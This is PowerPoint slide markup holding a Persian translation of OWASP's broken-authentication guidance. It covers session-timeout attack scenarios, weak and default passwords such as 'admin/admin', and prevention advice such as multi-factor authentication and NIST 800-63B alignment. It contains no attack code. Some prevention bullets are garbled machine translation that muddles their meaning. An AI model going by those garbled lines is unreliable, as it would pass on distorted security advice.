              <a:t>مهلت زمانی نشست برنامه کاربردی به درستی تنظیم نشده است. یک کاربر از یک رایانه عمومی برای دسترسی به یک برنامه کاربردی استفاده می کند. کاربر به جای انتخاب "خروج از سیستم"،  تنها به بستن مرورگر اکتفا کرده و سیستم را رها می کند. مهاجم از این مرورگر یک ساعت بعد استفاده می کند و  احراز هویت کاربر قربانی هنوز معتبر است.</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fa-IR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>آیا برنامه کاربرد آسیب‌پذیر است؟</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" rtl="1"/>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>تأیید هویت کاربر، احراز هویت و مدیریت نشست برای حفاظت از حملات مرتبط با احراز هویت حیاتی است.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" rtl="1"/>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>اگر برنامه کاربردی شامل موارد زیر باشد ضعف های آسیب‎‌پذیری وجود خواهند داشت: </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" rtl="1"/>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>• اجازه حملات خودکار را به مهاجم بدهد. مانندحملات جاسازی احراز هویت، که در آن مهاجم دارای لیستی از نام‌های کاربری و کلمه عبور معتبر را در اختیار دارد.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" rtl="1"/>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>• اجازه حملات خودکار رمز عبور یا حملات خودکار دیگر را بدهد. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" rtl="1"/>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>• اجازه ثبت رمزهای عبور پیش فرض، ضعیف یا شناخته شده مانند "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>Password1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>" یا </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>admin / admin"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>" را بدهد. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="just" rtl="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>از فرآیندهای ضعیف یا ناکارآمد بازیابی یا فراموشی احراز هویت رمز، مانند "پاسخهای مبتنی بر دانش"، استفاده کند که امن نیستند.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="just" rtl="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>با استفاده از متن آشکار، رمزنگاری شده و یا رمزهای هش ضعیف شده استفاده کند (نگاه کنید به </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>A3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>: ۲</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>017-Sensitive Data Exposure).</a:t>
            </a:r>
            <a:endParaRPr lang="fa-IR" sz="1050" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="just" rtl="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>از روش های احراز هویت چند مرحله ای ناکارآمد استفاده کند. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="just" rtl="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>شناسه نشست در </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> قابل مشاهده باشد. (مثل </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>URL, Rewriting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="just" rtl="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>شناسه نشست پس از ورود موفق به سیستم ، تغییر نکرده باشد. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="just" rtl="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>شناسه های نشست تداوم نداشته باشند. نشست های کاربر یا توکن های احراز هویت (به ویژه توکن های </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>(Single sign-on SSO)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> در زمان خروج از سیستم یا یک دوره غیرفعال بودن به درستی اعتبار ندارند.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>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gn="r" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>منابع</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4"/>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6"/>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8"/>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OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>Cheat Sheet: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId11"/>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Session Management</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2"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Automated Threats Handbook</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:hlinkClick r:id="rId13"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>خارجی</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId14"/>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6"/>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7"/>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r">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>نحوه پیشگیری از حمله</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>در صورت امکان، احراز هویت چند عامل را برای جلوگیری از حملات خودکار، اعتبارنامه، نیروی بی رحمانه و حملات مجدد اعتبارنامه ربوده شده پیاده سازی کنید.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>آیا </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>با هیچ مدرک پیش فرض، مخصوصا برای مدیران مدیریت، ارسال و ارسال نمی شود.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>اجرای چک های ضعیف رمز عبور، مانند تست گذرواژه های جدید یا تغییر یافته در برابر یک لیست از 10000 بدترین رمزهای عبور.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>خطاهای رمز عبور، پیچیدگی و چرخش را با دستورالعملهای </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>NIST 800-63 B </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>در بخش 5.1.1 برای اسرار حفظ شده یا سایر سیاستهای رمز عبور مدرن مبتنی بر شواهد منطبق کنید.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>اطمینان از ثبت نام، بازیابی اعتبارنامه ها و مسیرهای </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>در برابر حملات شمارش حساب، با استفاده از پیام های مشابه برای تمام نتایج، تشدید می شود.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>محدود کردن یا به طور فزاینده ای تلاشهای ورود به سیستم را تاخیر می دهد. همه خرابی ها را وارد کنید و مدیران را هشدار دهید وقتی که اعتبار نامه ها، نیروی بی رحم یا سایر حملات شناسایی می شوند.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>استفاده از یک مدیر جلسه ای امن، امن، ساخته شده در جلسه که یک شناسه جلسه تصادفی جدید با انتروپی بالا پس از ورود ایجاد می کند. شناسه جلسه نباید در نشانی اینترنتی باشد، پس از خروج از سیستم، بیکار و زمان وقوع مطلق، ایمن ذخیره و نامعتبر باشد.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>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pPr algn="ctr" rtl="1"/>
            <a:r>
              <a:rPr lang="fa-IR" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>احراز هویت ناقص</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="34" name="Tabelle 33"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33894509"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="10800" y="939600"/>
          <a:ext cx="6836400" cy="23496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fa-IR" sz="1000" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>قابلیت بهره‌برداری</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1000" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>۳</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baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>شیوع</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx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۲</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fa-IR" sz="1000" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
